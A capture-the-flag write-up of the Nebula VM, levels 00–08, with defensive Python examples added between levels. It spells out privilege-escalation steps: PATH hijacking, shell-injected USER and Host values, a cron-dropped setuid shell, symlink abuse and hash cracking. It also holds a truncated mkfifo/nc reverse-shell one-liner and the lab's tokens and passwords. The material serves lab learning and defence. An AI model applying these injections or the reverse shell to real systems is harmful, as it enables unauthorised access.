I’ve been having a go at Nebula just for the lulz, and it seems like an interesting VM since it covers a gamut of vulnerabilities ranging from crappy PATH issues to the cool Python pickle functions. I thought a write-up was due even though I’ve seen countless versions online; just for a feeling of satisfaction and for archiving the way I did it (to laugh at myself years later).
Now, if you are like me and connect to your VM via ssh, there is a high probability that you will encounter the following error: “Couldn’t agree on a host key algorithm (available: ecdsa-sha2-nistp256)”, or something along those lines.
Not to worry; do the following to generate a fresh ssh host keypair:

Log in to the nebula account, then:
cd /etc/ssh
sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
vi /etc/ssh/sshd_config
(uncomment this line if it is commented: HostKey /etc/ssh/ssh_host_dsa_key)
chgrp ssh_keys ssh_host_dsa_key
sudo service sshd restart

Now that’s out of the way:
Level00
Pretty straightforward; more probably a warm-up exercise. It asks you to find an executable with the setuid bit set for user flag00.

level00@nebula:~$ find / -perm /u=s -user flag00 2>/dev/null
/bin/.../flag00
/rofs/bin/.../flag00
level00@nebula:~$ /rofs/bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account
Level01
This is a straightforward PATH manipulation trick. I created a symbolic link, ln -s /bin/getflag /tmp/echo, and changed the path with PATH=/tmp:$PATH. This essentially makes /tmp the first place the system searches for echo, and is similar to Windows DLL hijacking. Once you run the flag01 executable you should get the flag.
Level02
Once again it does an echo based on the environment variable USER; we could manipulate it by doing something like the below:
USER='hi;/bin/sh;'
export USER
This is a lazy man’s way of getting the file to execute a shell, but once again you get a shell running in the context of flag02. Run your getflag for the win :P
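Both level01 and level02 come down to a privileged program trusting its caller’s environment: PATH decides which echo runs, and USER is spliced into a shell command line. The following is an added example, not code from the exercise, showing the two fixes a defender would apply in a wrapper that must launch a helper: pin PATH and drop loader variables, and pass untrusted values as argv entries instead of through a shell. The variable list and the greeting text are assumptions for this example.

```python
import os
import shlex
import subprocess

# Variables a privileged wrapper must never inherit from its caller. The set
# is an assumption for this example; extend it for your own environment.
UNTRUSTED_VARS = {"PATH", "IFS", "ENV", "BASH_ENV", "CDPATH"}
SAFE_PATH = "/usr/bin:/bin"


def scrub_env(inherited):
    """Return a minimal environment for a child launched from privileged code.
    Lookup and loader variables (PATH, LD_*) are dropped and PATH is pinned,
    so a /tmp/echo planted by the caller can never shadow /bin/echo."""
    env = {k: v for k, v in inherited.items()
           if k not in UNTRUSTED_VARS and not k.startswith("LD_")}
    env["PATH"] = SAFE_PATH
    return env


def greeting_argv(user):
    """Build the argv for a level02-style greeting without going through a
    shell: the USER value becomes one argument, so 'hi;/bin/sh;' is just text.
    The message wording is made up for this example."""
    return ["/bin/echo", "hello", user]


def shell_safe_greeting(user):
    """If a shell really is unavoidable, the untrusted value must at least be
    quoted; this is the fallback, not the preferred fix above."""
    return "/bin/echo hello " + shlex.quote(user)


def run_greeting(user, inherited_env):
    """Run the greeting with a scrubbed environment and return its output."""
    done = subprocess.run(greeting_argv(user), env=scrub_env(inherited_env),
                          capture_output=True, text=True, check=True)
    return done.stdout.strip()


if __name__ == "__main__":
    # A hostile caller environment shaped like the level01/level02 attacks.
    hostile = dict(os.environ, PATH="/tmp:" + os.environ.get("PATH", ""),
                   USER="hi;/bin/sh;")
    print(run_greeting(hostile["USER"], hostile))   # prints: hello hi;/bin/sh;
```

With the argv form the semicolons in USER never reach a shell, and with the pinned PATH the /tmp/echo symlink is never consulted, which is exactly what the two setuid binaries in these levels fail to do.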
Level03
The flag03 folder shows a bash script and a writable directory; the script executes anything in the folder before removing it :) What I did was create a bash script called crap in writable.d and a C program which invoked a bash shell with uid, gid etc. set to 996 (you can get the uid of flag03 by doing a cat /etc/passwd). My “crap” file in writable.d looked like this:

cat crap
#!/bin/sh
gcc -o /home/flag03/flagzuser /tmp/run.c; chmod +s,a+rwx /home/flag03/flagzuser

Once writable.sh is run you get an executable with the setuid bit set. Run it and execute getflag.
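The root cause in level03 is a scheduled job that executes whatever sits in a directory other users can write to. As an added example (not part of the exercise or the write-up), here is the audit a runner script or a hardening check would perform before executing anything from such a directory: refuse a writable directory, writable entries, symlinks, and files owned by anyone but the trusted uids. The fixture directory it builds is constructed for the demo.

```python
import os
import stat
import tempfile

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def insecure_entries(directory, trusted_uids):
    """List what a cron-driven 'run everything in this directory' script
    should refuse: a directory anyone can drop files into, entries writable by
    group or others, symlinks, and entries owned by an untrusted uid.
    Returns (path, reason) pairs; an empty list means the directory is clean."""
    findings = []
    dir_st = os.lstat(directory)
    if dir_st.st_mode & WRITABLE_BY_OTHERS:
        findings.append((directory, "directory is group/world writable"))
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, "symlink in runner directory"))
            continue
        if st.st_mode & WRITABLE_BY_OTHERS:
            findings.append((path, "entry is group/world writable"))
        if st.st_uid not in trusted_uids:
            findings.append((path, "owned by untrusted uid %d" % st.st_uid))
    return findings


def run_demo():
    """Constructed fixture shaped like writable.d: the directory and one script
    ('crap') are world-writable, a second script ('safe') is owner-only."""
    d = tempfile.mkdtemp(prefix="writable.d-")
    for name, mode in (("crap", 0o777), ("safe", 0o700)):
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho constructed example\n")
        os.chmod(path, mode)
    os.chmod(d, 0o777)
    findings = insecure_entries(d, trusted_uids=(os.getuid(),))
    return {"dir": d,
            "flagged": sorted(os.path.basename(p) for p, _ in findings),
            "reasons": [r for _, r in findings]}


if __name__ == "__main__":
    demo = run_demo()
    for name, reason in zip(demo["flagged"], demo["reasons"]):
        print("%-24s %s" % (name, reason))
```

Run against the real writable.d the same function would flag the directory itself, which is the finding that matters: once any user can drop a file there, the uid the cron job runs as is effectively shared with everyone.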
Level04
This is a fun one too. Looking at the source code you can see that the program does not read the file called “token”, but that’s where our flag is -_- . Symbolic linking time!!

ln -s /home/flag04/token /tmp/crap
Then run ./flag04 /tmp/crap and you should get a token: 06508b5e-8909-4f38-b630-fdb148a848a2

Level05
This one actually reflects what might happen when you get a shell during a pentest. A pen tester’s dream would be to use that uber cool remote exploit to one-shot and get a remote # shell, but most privilege escalations happen by poking around and finding a misconfiguration, or in this case ssh keys :p Doing an ls -al shows a nice juicy directory called .backup.

I extracted the tgz file into /tmp/flag05:
mkdir -p /tmp/flag05
tar xvzf backup-19072011.tgz -C /tmp/flag05/
Then I went to /tmp/flag05/.ssh and ran ssh -i id_rsa firstname.lastname@example.org. You should be able to run getflag ;)
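The level04 binary rejects the name “token” but happily follows a symlink to it, a classic name-based check that a privileged reader should replace with an inode-based one. This added example (mine, not the exercise’s source) shows the defensive open: lstat first, open with O_NOFOLLOW, then confirm the descriptor refers to the same inode and is a regular file. The token file and link it creates are a constructed fixture, and the token value is a placeholder.

```python
import errno
import os
import stat
import tempfile


class SymlinkRefused(Exception):
    """Raised when the path is, or turns out to be, a symlink."""


def read_no_follow(path, limit=4096):
    """Read up to `limit` bytes from `path` only if it is a real regular file.
    O_NOFOLLOW makes the kernel fail the open when the last path component is
    a symlink (ELOOP); comparing the descriptor's inode with the one seen by
    lstat() beforehand also catches a link swapped in between the two calls."""
    before = os.lstat(path)
    if stat.S_ISLNK(before.st_mode):
        raise SymlinkRefused(path)
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as exc:
        if exc.errno == errno.ELOOP:
            raise SymlinkRefused(path) from exc
        raise
    try:
        after = os.fstat(fd)
        if (after.st_dev, after.st_ino) != (before.st_dev, before.st_ino):
            raise SymlinkRefused(path)
        if not stat.S_ISREG(after.st_mode):
            raise SymlinkRefused(path)
        return os.read(fd, limit)
    finally:
        os.close(fd)


def demo():
    """Constructed fixture: a 'token' file plus a symlink to it, the layout of
    the level04 trick. Returns what reading each path produced."""
    d = tempfile.mkdtemp()
    token = os.path.join(d, "token")
    link = os.path.join(d, "crap")
    with open(token, "w") as fh:
        fh.write("constructed-token-value\n")   # placeholder, not the VM's token
    os.symlink(token, link)
    result = {"direct": read_no_follow(token).decode().strip()}
    try:
        read_no_follow(link)
        result["via_symlink"] = "opened"
    except SymlinkRefused:
        result["via_symlink"] = "refused"
    return result


if __name__ == "__main__":
    print(demo())   # {'direct': 'constructed-token-value', 'via_symlink': 'refused'}
```

Checking the string “token” in argv, as the level does, protects nothing: the decision has to be made on the object the kernel actually opens, which is what the fstat comparison gives you.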
Level06
The hint on the site says it’s a legacy unix system challenge, so cat /etc/passwd. Notice that flag06 has a hash in its entry: take the hash, crack it with John the Ripper and get the flag06 password, which is hello ??? getflag ! :)
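What makes level06 “legacy” is password material living in the world-readable /etc/passwd instead of /etc/shadow. As an added example (not from the write-up), here is the check an auditor runs over a passwd file to spot such entries and classify the hash scheme. The sample lines are constructed; the flag06 hash field is a 13-character placeholder in DES crypt shape, not the VM’s real hash, and the uids are made up.

```python
import re

# Constructed lines in /etc/passwd format. The flag06 hash field is a
# placeholder shaped like a 13-character DES crypt value, not the VM's hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
flag06:AbcDEfgHIjkLm:993:993::/home/flag06:/bin/sh
level06:x:1007:1007::/home/level06:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
guest::1500:1500::/home/guest:/bin/sh
"""

DES_CRYPT = re.compile(r"[./0-9A-Za-z]{13}")


def hash_scheme(pw_field):
    """Classify the second field of a passwd entry. Returns None when the
    account is shadowed or locked (nothing to crack), else a label."""
    if pw_field == "x" or pw_field.startswith(("*", "!")):
        return None
    if pw_field == "":
        return "empty (login without a password)"
    if pw_field.startswith("$1$"):
        return "md5-crypt"
    if pw_field.startswith("$5$"):
        return "sha256-crypt"
    if pw_field.startswith("$6$"):
        return "sha512-crypt"
    if DES_CRYPT.fullmatch(pw_field):
        return "des-crypt (legacy, 8 significant characters)"
    return "unrecognised"


def exposed_accounts(passwd_text):
    """Return (user, uid, scheme) for every entry whose password material sits
    in the world-readable passwd file instead of /etc/shadow."""
    found = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        scheme = hash_scheme(fields[1])
        if scheme is not None:
            found.append((fields[0], int(fields[2]), scheme))
    return found


if __name__ == "__main__":
    for user, uid, scheme in exposed_accounts(SAMPLE_PASSWD):
        print("%-10s uid=%-6d %s" % (user, uid, scheme))
```

A DES crypt hash is readable by every local user and only covers the first eight characters of the password, which is why a short wordlist run with John is enough here; the fix is pwconv (move hashes to shadow) and a modern crypt scheme.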
Flag07
The thttpd conf file shows that it runs an http server on port 7007. If you connect to index.cgi it shows a ping usage, and as per the source code you get to pass a variable called Host to the CGI script. I passed ?Host=localhost and got the results back. Tried ?Host=localhost;id but it didn’t work, since you need to URL-encode the ; as %3B. Now that I see that the id is for flag07, I passed the following: ?Host=localhost%3Bgetflag, which displayed the flag information. You could probably go about it a cooler way by encoding a command for a reverse shell back to your attacking VM :)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc

Make sure you encode the command before sending it across!
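The CGI in flag07 hands the decoded Host parameter to a shell, so a %3B becomes a command separator. The following added example (not the level’s script, and the ping options it uses are an assumption) shows the two sides a defender cares about: strict hostname validation with no shell in the path, and a log scan that flags requests whose decoded parameter carries shell metacharacters. The access-log lines are constructed for the demo.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# RFC 1123 style hostname: labels of letters, digits and hyphens, no leading
# or trailing hyphen, 253 characters at most. Anything else is rejected.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*")


def validate_host(raw_param):
    """Percent-decode the Host parameter and accept it only as a bare hostname."""
    return HOSTNAME_RE.fullmatch(unquote_plus(raw_param)) is not None


def ping_argv(raw_param):
    """argv for the ping call without a shell, so no metacharacter is ever
    interpreted. The ping options are assumed, not taken from the CGI."""
    if not validate_host(raw_param):
        raise ValueError("Host parameter rejected")
    return ["ping", "-c", "3", unquote_plus(raw_param)]


SHELL_META = re.compile(r"[;&|`$<>()\n\r]")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_requests(log_lines):
    """Flag index.cgi requests whose decoded Host value carries shell
    metacharacters; returns (raw_query, decoded_host) pairs in log order."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlparse(m.group(1))
        if not url.path.endswith("/index.cgi"):
            continue
        for host in parse_qs(url.query, keep_blank_values=True).get("Host", []):
            if SHELL_META.search(host):
                hits.append((url.query, host))
    return hits


# Constructed access-log lines in combined format; the second and third carry
# the ';' encoded as %3B, the only form the server would have decoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Jul/2011:10:00:01 +0000] "GET /index.cgi?Host=localhost HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Jul/2011:10:00:07 +0000] "GET /index.cgi?Host=localhost%3Bid HTTP/1.1" 200 600',
    '10.0.0.5 - - [19/Jul/2011:10:00:09 +0000] "GET /index.cgi?Host=localhost%3Bgetflag HTTP/1.1" 200 640',
    '10.0.0.9 - - [19/Jul/2011:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    print(ping_argv("localhost"))
    for query, host in suspicious_requests(SAMPLE_LOG):
        print("suspicious: %-32s decoded Host=%r" % (query, host))
```

Scanning the raw query string for a literal ; would miss every one of these requests; the detector has to decode the parameter the same way the server did before looking for metacharacters.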
Flag08
I learned something from this flag too: 0x7f (DEL, which is what the backspace key sends) is a backspace. If you do a tcpdump -qns 0 -A -r capture.pcap, or transfer the pcap to Wireshark and view it in hex view, you will see that there are a couple of 0x7f (rendered as .) after “backdoor”, so essentially the password becomes backd00Rmate. Do a su to flag08 with the password backd00Rmate and you should get your flag.
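Reading the capture by hand works for one short password, but the analyst’s version of this step is to replay the keystroke stream the way the remote line discipline would, treating 0x7f and 0x08 as erase. This is an added example, not code from the write-up; the byte string it replays is a constructed model of a user mistyping and correcting, not the pcap’s contents. It also shows why the backspaces appear as dots in the tcpdump -A output.

```python
DEL = 0x7F   # what most terminals send for the backspace key
BS = 0x08    # the other common backspace code
ENTER = (0x0D, 0x0A)


def reconstruct_typed(keystrokes):
    """Replay a client-to-server keystroke stream the way the remote line
    discipline would: printable bytes append, DEL/BS erase the previous
    character, Enter ends the line. Returns the text the server saw."""
    buf = []
    for b in keystrokes:
        if b in (DEL, BS):
            if buf:
                buf.pop()
        elif b in ENTER:
            break
        elif 0x20 <= b < 0x7F:
            buf.append(chr(b))
        # any other control byte is ignored
    return "".join(buf)


def ascii_view(keystrokes):
    """The tcpdump -A / Wireshark ASCII rendering: every non-printable byte
    becomes '.', which is why the backspaces show up as dots after the word."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in keystrokes)


# Constructed keystroke stream modelling a user who types 'backdoor', erases
# three characters, types '00Rm8', erases one, then finishes with 'ate'. It is
# a model of the capture, not the pcap's bytes.
SAMPLE_KEYSTROKES = b"backdoor\x7f\x7f\x7f00Rm8\x7fate\r"

if __name__ == "__main__":
    print(ascii_view(SAMPLE_KEYSTROKES))         # backdoor...00Rm8.ate.
    print(reconstruct_typed(SAMPLE_KEYSTROKES))  # backd00Rmate
```

In an interactive telnet-style session each keystroke usually travels in its own packet, with the server echoing it back, so the input to reconstruct_typed is the client-to-server payload bytes concatenated in order, with the server’s echo stream ignored.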
Flag 09-Flag18 in the next part